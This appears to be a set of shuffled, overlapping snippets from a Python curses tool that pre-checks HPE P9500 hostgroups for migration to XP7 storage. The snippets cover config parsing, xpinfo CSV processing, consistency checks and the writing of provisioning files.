"sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide()",
"self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end ))",
"sys import os import os.path import csv import string import xp7 #################################################################################################### ###",
"Add config file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG",
"1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end =",
"HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name",
"logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else:",
"= \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section):",
"\"\"\" update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list",
"file and daemon to pairdisplay & check on status #################################################################################################### \"\"\" import curses",
"= self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line =",
"adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key",
"self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index",
"index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif",
"self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line =",
"in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr])))",
"+ self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item)",
"self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top()",
"as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def",
"serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {}",
"- 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0:",
"line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >=",
"1 if n < 0: if self.position - self.slice_start < 2 and self.slice_start",
"self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self):",
"<= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break",
"2 and self.slice_start >= 1: ### slide slice up ### self.slice_start += n",
"search term criteria 1.3 Add config file 2.0 Consistency check update 2.1 Add",
"len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict",
"now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping",
"for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif",
"matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection",
"hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item",
"self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item =",
"= title self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title,",
"section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()]",
"self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection",
"AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0",
"else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if",
"expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr)",
"box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the",
"show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display))",
"ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary",
"self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if",
"not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not",
"### write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if",
"= box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during",
"os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0",
"self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode)",
"= [] self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start",
"self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update the list of",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set))",
"elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate",
"x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh()",
"define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border()",
"0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position",
"serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] =",
"= set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file",
"slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <=",
"######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search =",
"executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key",
"= {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### ####################################################################################################",
"self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items",
"to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name",
"defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name",
"value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except:",
"= copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which fits",
"except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except:",
"TODO : add generate temporary horcm file and daemon to pairdisplay & check",
"slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1:",
"ODR framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add search",
"= stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define",
"self.display_list = [] self.consistent = consistent def navigate(self,n): if n < 0: if",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key",
"1: ### slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list)",
"HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search",
"##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level)",
"0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end",
"if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr",
"files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir)",
"[ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break",
"line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent =",
"about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display",
"int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in",
"### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key",
"file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value",
"= len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show()",
"def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and width",
"set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host",
"< 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1)",
"if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5])",
"Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent",
"else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate ldev",
"enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index <=",
"#################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if",
"display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if",
"stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0)",
"self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if",
"the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ###",
"self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update",
"class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start",
"log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined,",
"{} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added",
"serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if",
"menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display))",
"HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr)",
"self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list",
"serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set:",
"= line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position ==",
"### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ###",
"while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position:",
"all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"add found hostgroups to the selection ### for box_name in hostgroup_dict: for hostgroup_name",
"= cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir =",
"### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list)",
"serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger",
"update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO",
": xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file and",
"= [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent]))",
"added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name))",
"{} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ###",
"def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items):",
":: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x",
"self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def",
"processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr",
"main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window =",
"= set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f:",
"def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg",
"### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else:",
"instance_dict = {} site_dict = {} collectfile_dict = {} box_dict = {} ####################################################################################################",
"self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start >= 1:",
"Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT",
"dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a",
"PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win",
"self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position < 0:",
"\"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by",
"# menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH",
"== curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window =",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search = search",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning",
"results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display))",
"the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr):",
"box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start",
"__init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"self.title = title self.selection = [] def display(self): self.window.clear() line = \"{} :",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window",
"### fill the list to display ### self.display_list = [] for box_name,hostgroup_name in",
"< 0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items) -",
"ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to",
"logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### #########################",
"n > 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list)",
"self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh()",
"update(self): \"\"\" update the selection items list to match the new search criteria",
"not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display))",
"= window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list =",
"ConfigParser import ConfigParser import sys import os import os.path import csv import string",
"select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups",
"elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels()",
"fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end =",
"not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value",
"sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect",
"= min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for",
"self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys())",
"current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return",
"def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width:",
"1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate ::",
"panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0: if self.slice_start >=",
"logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir))",
"[ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break",
"add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added",
"self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width",
"PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS",
"self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]:",
"config file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG :",
"box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr",
"to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ###",
"panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the",
"= 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def",
"hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent",
"= line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display ::",
"### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader =",
"del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\")",
"Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection",
"the selection items list to match the new search criteria \"\"\" if self.search.get()",
"= [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH",
"= {} instance_dict = {} site_dict = {} collectfile_dict = {} box_dict =",
"select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO",
"if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]()",
"if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position =",
"self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply)",
"= ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait",
"= {} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict =",
"20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win",
"search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display()",
":\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\")",
"{}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update ::",
"to examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION",
"list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know",
"copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0",
"selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent",
"self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items",
